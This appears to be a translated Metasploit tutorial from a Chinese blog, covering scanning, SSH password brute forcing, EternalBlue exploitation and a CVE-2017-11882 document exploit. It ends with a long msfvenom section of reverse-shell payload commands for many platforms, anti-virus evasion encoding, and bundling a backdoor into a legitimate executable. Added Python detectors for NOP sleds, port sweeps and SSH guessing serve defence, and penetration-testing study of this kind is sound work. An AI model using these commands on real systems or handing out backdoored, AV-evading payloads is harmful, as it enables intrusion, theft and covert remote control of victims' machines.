MSF usage tutorial

1. Introduction

Metasploit is an open-source vulnerability detection and exploitation framework that ships with hundreds of modules for known software vulnerabilities and is updated frequently. It is a powerful penetration-testing framework, dubbed by the security community as one that "can hack the entire universe."

2. Introduction to MSF modules

1. Auxiliary modules (auxiliary)

Responsible for functions such as information gathering, scanning, sniffing, fingerprinting, password guessing and DoS attacks

2. Exploit modules (exploits)

Modules that exploit a system vulnerability to attack the target. Each exploit module corresponds to the attack method (active or passive) of one specific vulnerability.

Active exploits: send network data to the target to trigger the vulnerability. Examples include web application exploits and exploits against SCADA industrial control system services.

Passive exploits: browser vulnerability and file-format vulnerability attacks, which lure the target user into opening a file or page that triggers the vulnerability.

Enter the command in msfconsole:

show exploits	# list the exploit modules the current Metasploit supports

3. Payload modules (payloads)

The code to execute on the target system once it has been exploited, for example a reverse shell or a bind shell.

Enter in the msfconsole interface:

show payloads	# list the payloads the current system supports

4. NOP modules (nops)

NOP (no-operation) instructions are instructions that have no substantive effect on a program's running state; on x86 CPUs the single-byte NOP is 0x90. Exploits use runs of them as padding (a "NOP sled") so that execution landing anywhere in the padding slides forward into the payload.

Enter in msfconsole:

show nops		# list the NOP generators the current system supports
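The 0x90 value above is also what a defender looks for. The following Python code is an added example (not part of the original tutorial) that scans a byte buffer for a long run of single-byte x86 NOPs, the classic network-IDS heuristic for spotting a NOP sled in a request or file. The 16-byte threshold and the sample buffers are assumptions constructed for the example.

```python
# Added example (not from the original tutorial): detect an x86 NOP sled
# (a long run of 0x90 bytes) in a byte buffer, the classic network-IDS
# heuristic for shellcode padding carried in a request or file.

NOP_X86 = 0x90


def longest_nop_run(buf: bytes, nop: int = NOP_X86) -> int:
    """Return the length of the longest consecutive run of `nop` bytes in buf."""
    best = cur = 0
    for b in buf:
        if b == nop:
            cur += 1
            best = max(best, cur)
        else:
            cur = 0
    return best


def looks_like_nop_sled(buf: bytes, min_run: int = 16) -> bool:
    """Flag buffers whose longest 0x90 run is at least min_run bytes.

    min_run is an assumed threshold: ordinary text and most binary data
    rarely contain many consecutive 0x90 bytes, so a long run is worth
    inspecting. Tune it against your own traffic to limit false positives.
    """
    return longest_nop_run(buf) >= min_run


if __name__ == "__main__":
    # Constructed sample inputs (not real captures).
    benign = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
    suspicious = b"A" * 8 + b"\x90" * 40 + b"\xcc\xcc\xcc\xcc"
    for name, sample in (("benign", benign), ("suspicious", suspicious)):
        print(name, longest_nop_run(sample), looks_like_nop_sled(sample))
```

Note that encoders (section 5 below) exist partly to defeat exactly this kind of signature, so a run-of-0x90 check is a cheap first filter, not a complete detection.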

5. Encoder modules (encoders)

Function 1: Ensure the payload contains none of the "bad characters" that must be avoided during an exploit (for example a null byte that would terminate a string copy)

Function 2: Apply anti-virus evasion ("kill-free") processing to the payload

Enter in the msfconsole interface:

show encoders	# list the encoders the current system supports

6. Post-exploitation modules (post)

Post-exploitation modules perform actions on the compromised system after access is gained, such as collecting sensitive information, extending access further, and pivoting to attack other hosts.

Enter in the msfconsole interface:

show post		# list the post-exploitation modules the current system supports

7. Evasion modules (evasion)

Enter in the msfconsole interface:

show evasion    # list the anti-virus evasion modules

3. MSF basics

Updating msf:

sudo apt-get update
sudo apt-get install metasploit-framework

If msf reports an error on startup:

sudo apt-get install bundler
cd /usr/share/metasploit-framework
sudo bundle install

Command quick reference:

msfconsole        Start MSF from the command line
exit              Exit msfconsole
use               Select a module
back              Leave the current module
info              Show module details
set               Set a module option
run               Run the module
exploit           Run the module (same as run for exploit modules)
show options      Show the module's configuration options
show targets      Show the target types the module applies to
show payloads     Show the payloads compatible with the module
search            Search modules by keyword
background        Send the current session to the background
sessions          Manage sessions
sessions -i <id>  Interact with a session by ID

4. MSF information collection

1. Host discovery

use auxiliary/scanner/discovery/<module>	# there are 7 modules under this path for host discovery
0  auxiliary/scanner/discovery/arp_sweep
1  auxiliary/scanner/discovery/empty_udp
2  auxiliary/scanner/discovery/ipv6_multicast_ping
3  auxiliary/scanner/discovery/ipv6_neighbor
4  auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
5  auxiliary/scanner/discovery/udp_probe
6  auxiliary/scanner/discovery/udp_sweep

Take arp_sweep as an example:

use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.1/24
set THREADS 50				# set the thread count to 50
run

2. Port scanning

use auxiliary/scanner/portscan/*

The SYN port scanner is generally recommended because it is fast and, since it never completes the TCP handshake, the scanned service itself does not log a connection (a firewall or IDS watching the network still sees the SYN packets).

use auxiliary/scanner/portscan/syn
show options
set RHOSTS 192.168.1.142
set PORTS 1-65535  		# scanning all ports takes a long time
set THREADS 50000
run
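From the defender's side, the SYN scan above leaves a distinctive trace: one source touching many distinct ports of one host within a short time. The following Python code is an added example (not from the tutorial) that flags such sweeps in firewall-style log lines. The log line format, the 60-second window and the 20-port threshold are assumptions, and the sample lines are constructed for the example.

```python
# Added example (not from the original tutorial): detect a port sweep in
# firewall-style log lines. One source hitting many distinct destination
# ports on a host in a short window is what a SYN scanner leaves behind.
import re
from collections import defaultdict
from datetime import datetime

# Assumed log format (constructed for this example):
#   "<ISO timestamp> SRC=<ip> DST=<ip> DPT=<port> SYN"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) DPT=(?P<dpt>\d+) SYN$"
)


def parse_line(line):
    """Return (timestamp, src, dst, port) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return (datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dpt"]))


def detect_port_sweeps(lines, window_seconds=60, min_ports=20):
    """Return {(src, dst): distinct_ports} for source/destination pairs that
    touch at least min_ports distinct ports inside any sliding window of
    window_seconds. Both thresholds are assumed tuning values."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, port), ...]
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dst, port = parsed
            events[(src, dst)].append((ts, port))

    alerts = {}
    for pair, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits within window_seconds.
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            ports = {p for _, p in evs[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[pair] = max(alerts.get(pair, 0), len(ports))
    return alerts


def sample_log():
    """Constructed sample: one scanner hitting 25 ports of 10.0.0.20 within
    10 seconds, plus a normal client reconnecting to port 443 repeatedly."""
    lines = []
    for i in range(25):
        lines.append(f"2024-01-01T10:00:{i % 10:02d} SRC=10.0.0.5 DST=10.0.0.20 DPT={i + 1} SYN")
    for i in range(25):
        lines.append(f"2024-01-01T10:{i:02d}:00 SRC=10.0.0.9 DST=10.0.0.20 DPT=443 SYN")
    return lines


if __name__ == "__main__":
    for (src, dst), n in detect_port_sweeps(sample_log()).items():
        print(f"possible port sweep: {src} -> {dst}, {n} distinct ports")
```

The repeat client to port 443 is deliberately not flagged: the rule counts distinct ports, not connection attempts, which is what separates a sweep from a busy but legitimate client.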

3. Detecting service details

sudo nmap -A -p- -sS -sC -T4 -Pn 192.168.1.1

4. Service enumeration

The scanner auxiliary modules in Metasploit include many tools for service scanning and enumeration, usually named [service_name]_version and [service_name]_login.

[service_name]_version	Finds the hosts on the network running a given service and determines the service version
[service_name]_login	Performs password-guessing attacks against a given service

SSH service scan:

search ssh_version
use 3				# index of auxiliary/scanner/ssh/ssh_version in the search output (the number varies by installation)
show options
set RHOSTS 192.168.1.1/24
set THREADS 50				# set the thread count to 50
run

Telnet service scan:

search telnet_version
use auxiliary/scanner/telnet/telnet_version

Other service enumeration:

use auxiliary/scanner/oracle/tnslsnr_version       	# Oracle service scan
use auxiliary/scanner/mssql/mssql_ping				# MSSQL scan
use auxiliary/scanner/mysql/mysql_version			# MySQL scan
use auxiliary/scanner/ftp/ftp_version				# FTP scan
use auxiliary/scanner/http/http_version				# HTTP scan

5. Password guessing

Dictionary location:

/usr/share/wordlists			# on Kali

You can also download a dictionary from Baidu and copy it to Kali.

Password brute force: SSH

search ssh_login
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.1
set USERNAME kali
set PASS_FILE /home/tools/wordLists/pass_top1000.txt		# path to the dictionary
run

Guessing passwords for other services:

use auxiliary/scanner/telnet/telnet_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/smb/smb_login
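The ssh_login module above produces a burst of failed logins in the target's sshd log, which is how a defender spots it. The following Python code is an added example (not from the tutorial) that counts failures per source in OpenSSH auth.log lines and also flags a successful login that follows a burst of failures, the pattern of a guess that worked. The 5-attempt threshold is an assumption and the log lines are constructed for the example.

```python
# Added example (not from the original tutorial): detect SSH password
# guessing in OpenSSH auth.log lines and flag a success after many failures.
import re
from collections import Counter, defaultdict

# Patterns for the two OpenSSH message shapes this example cares about.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?:password|publickey) for (?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def analyze_auth_log(lines, threshold=5):
    """Summarise guessing activity.

    Returns a dict with:
      brute_force_sources     {ip: failed_attempts} for ips at/above threshold
      users_tried             {ip: sorted usernames} for those ips
      success_after_failures  [(ip, user, failures_before_success), ...]
    threshold is an assumed tuning value.
    """
    failures = Counter()            # ip -> failed attempts so far
    users_tried = defaultdict(set)  # ip -> usernames attempted
    success_after_failures = []

    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            failures[m["ip"]] += 1
            users_tried[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        # Counter returns 0 for unseen ips, so a clean login is never flagged.
        if m and failures[m["ip"]] >= threshold:
            success_after_failures.append((m["ip"], m["user"], failures[m["ip"]]))

    brute_force = {ip: n for ip, n in failures.items() if n >= threshold}
    return {
        "brute_force_sources": brute_force,
        "users_tried": {ip: sorted(users_tried[ip]) for ip in brute_force},
        "success_after_failures": success_after_failures,
    }


# Constructed sample log (not a real capture): one guessing source that
# eventually succeeds, and one user who mistypes a password once.
SAMPLE_AUTH_LOG = [
    "Jan  1 10:00:01 srv sshd[2001]: Failed password for invalid user admin from 192.0.2.10 port 51000 ssh2",
    "Jan  1 10:00:02 srv sshd[2002]: Failed password for invalid user test from 192.0.2.10 port 51001 ssh2",
    "Jan  1 10:00:03 srv sshd[2003]: Failed password for root from 192.0.2.10 port 51002 ssh2",
    "Jan  1 10:00:04 srv sshd[2004]: Failed password for root from 192.0.2.10 port 51003 ssh2",
    "Jan  1 10:00:05 srv sshd[2005]: Failed password for kali from 192.0.2.10 port 51004 ssh2",
    "Jan  1 10:00:06 srv sshd[2006]: Failed password for kali from 192.0.2.10 port 51005 ssh2",
    "Jan  1 10:00:07 srv sshd[2007]: Failed password for kali from 192.0.2.10 port 51006 ssh2",
    "Jan  1 10:00:08 srv sshd[2008]: Accepted password for kali from 192.0.2.10 port 51007 ssh2",
    "Jan  1 10:05:00 srv sshd[2100]: Failed password for alice from 192.0.2.20 port 40000 ssh2",
    "Jan  1 10:05:03 srv sshd[2101]: Accepted password for alice from 192.0.2.20 port 40001 ssh2",
]

if __name__ == "__main__":
    report = analyze_auth_log(SAMPLE_AUTH_LOG)
    for ip, n in report["brute_force_sources"].items():
        print(f"{ip}: {n} failed logins, users tried: {report['users_tried'][ip]}")
    for ip, user, n in report["success_after_failures"]:
        print(f"ALERT: {ip} logged in as {user} after {n} failures")
```

The success-after-failures list is the item worth paging on: a lone burst of failures is noise a lockout policy or fail2ban handles, but a success at the end of one means the dictionary contained the password.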

6. Website sensitive-directory scanning

Note that a directory dictionary must be provided here (one is available in Kali):

use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.1
run

7. Scanning the intranet for hosts with specific vulnerabilities

use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
host likely vulnerable to MS17-010			# the host has this vulnerability and can be exploited
host does not appear vulnerable				# the host is not vulnerable / does not have this vulnerability

5. Active penetration attack

1. EternalBlue

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
exploit

2. Drupal CVE-2018-7600

search drupal
......

6. Passive penetration attack

Office remote code execution vulnerability (CVE-2017-11882)

git clone http://github.com/starnightcyber/CVE-2017-11882.git

cd CVE-2017-11882

Vulnerability testing:

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc 	# -c the command to embed

7. msfvenom

-l List all available modules of the given type: payloads, encoders, nops, ... all
-p Specify the payload to use. Custom payloads are also supported, on almost every platform.
-f Specify the output format
-e Specify the encoder to use for anti-virus evasion
-a Specify the target architecture of the payload, such as x86, x64 or x86_64
-o Specify where to save the generated payload
-b Set the characters to avoid, i.e. the bad characters that must be filtered out. For example: do not use '\x0f', '\x00'
-n Prepend a NOP sled of the given length to the payload
-s Set the maximum size of the payload; the generated payload will be no larger than this
-i Specify the number of times to encode the payload
-c Specify an additional win32 shellcode file to include
-x Specify a custom executable file to use as a template
   For example: given a normal file normal.exe, this option bundles the backdoor into that program
-k Preserve the behaviour of the template program; the injected payload runs as a new process
   Used together with -x: the bundled normal.exe then still behaves normally while the payload runs
-v Specify a custom variable name for certain output formats
-t Number of seconds to wait when reading the payload from stdin (default 30, 0 disables the timeout)
-h Show help
--platform Specify the target platform of the payload

Plain payload generation:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/shell.exe

msfvenom -p windows/meterpreter/reverse_tcp -f exe -o /root/shell.exe

With encoding:

msfvenom -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/shell.exe

Bundled with a template executable:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x64 -x /root/baidunetdisk.exe -k LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/shell.exe

Windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho > shell.macho

PHP

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f asp

ASPX

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f aspx

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw

Python

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.10 LPORT=4444 -f raw

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.10 LPORT=4444 -f bash

WAR

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f war


Source: blog.csdn.net/huangyongkang666/article/details/123763862